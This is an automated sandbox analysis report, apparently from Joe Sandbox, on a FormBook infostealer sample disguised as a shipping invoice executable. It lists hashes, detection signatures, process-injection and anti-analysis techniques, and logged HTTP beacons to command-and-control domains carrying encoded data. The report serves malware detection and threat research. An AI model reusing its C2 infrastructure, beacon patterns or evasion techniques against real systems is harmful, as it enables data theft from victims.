Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name:	Shipping INVOICE-BL Shipment..exe
Analysis ID:	323227
MD5:	579ba39b6a146080ef6481591440e445
SHA1:	06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256:	d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags:	Formbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Executable has a suspicious name (potential lure to open the executable)

Hijacks the control flow in another process

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

PE file does not import any functions

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Prehnite.dll

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: Shipping INVOICE-BL Shipment..exe	Virustotal: Detection: 27%			Perma Link
Source: Shipping INVOICE-BL Shipment..exe	ReversingLabs: Detection: 44%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.cmd.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406469 FindFirstFileA,FindClose,	0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040592E

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	2_2_00416227
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	2_2_0040C37F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop esi	2_2_004157F1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	9_2_02F76227
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	9_2_02F6C37F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi	9_2_02F757F1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 192.0.78.24 192.0.78.24
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.carnesveymacr.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 14:09:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.3.19Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>

Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Shipping INVOICE-BL Shipment..exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Shipping INVOICE-BL Shipment..exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://openoffice.org/2001/block-list
Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://www.businessobjects.com0
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004053CB

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Source: Shipping INVOICE-BL Shipment..exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipping INVOICE-BL Shipment..exe

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00418180 NtCreateFile,	2_2_00418180
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00418230 NtReadFile,	2_2_00418230
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182B0 NtClose,	2_2_004182B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041817A NtCreateFile,	2_2_0041817A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182DA NtClose,	2_2_004182DA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182AC NtClose,	2_2_004182AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B795D0 NtClose,LdrInitializeThunk,	2_2_04B795D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79540 NtReadFile,LdrInitializeThunk,	2_2_04B79540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_04B796E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_04B797A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,	2_2_04B79780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,	2_2_04B79FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,	2_2_04B79710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_04B79860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk,	2_2_04B79840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk,	2_2_04B799A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_04B79910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk,	2_2_04B79A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk,	2_2_04B79A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B795F0 NtQueryInformationFile,	2_2_04B795F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7AD30 NtSetContextThread,	2_2_04B7AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79520 NtWaitForSingleObject,	2_2_04B79520
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79560 NtWriteFile,	2_2_04B79560
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B796D0 NtCreateKey,	2_2_04B796D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79610 NtEnumerateValueKey,	2_2_04B79610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79670 NtQueryInformationProcess,	2_2_04B79670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79660 NtAllocateVirtualMemory,	2_2_04B79660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79650 NtQueryValueKey,	2_2_04B79650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79730 NtQueryVirtualMemory,	2_2_04B79730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A710 NtOpenProcessToken,	2_2_04B7A710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79770 NtSetInformationFile,	2_2_04B79770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A770 NtOpenThread,	2_2_04B7A770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79760 NtOpenProcess,	2_2_04B79760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B798A0 NtWriteVirtualMemory,	2_2_04B798A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B798F0 NtReadVirtualMemory,	2_2_04B798F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79820 NtEnumerateKey,	2_2_04B79820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7B040 NtSuspendThread,	2_2_04B7B040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B799D0 NtCreateProcessEx,	2_2_04B799D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79950 NtQueueApcThread,	2_2_04B79950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A80 NtOpenDirectoryObject,	2_2_04B79A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A10 NtQuerySection,	2_2_04B79A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A00 NtProtectVirtualMemory,	2_2_04B79A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A3B0 NtGetContextThread,	2_2_04B7A3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79B00 NtSetValueKey,	2_2_04B79B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_008054E0 NtDelayExecution,	2_2_008054E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0080318C NtWriteVirtualMemory,	2_2_0080318C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk,	9_2_03749A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03749910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk,	9_2_037499A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03749860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk,	9_2_03749840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03749710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03749FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03749780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_037496E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk,	9_2_037496D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749540 NtReadFile,LdrInitializeThunk,	9_2_03749540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037495D0 NtClose,LdrInitializeThunk,	9_2_037495D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749B00 NtSetValueKey,	9_2_03749B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A3B0 NtGetContextThread,	9_2_0374A3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A20 NtResumeThread,	9_2_03749A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A10 NtQuerySection,	9_2_03749A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A00 NtProtectVirtualMemory,	9_2_03749A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A80 NtOpenDirectoryObject,	9_2_03749A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749950 NtQueueApcThread,	9_2_03749950
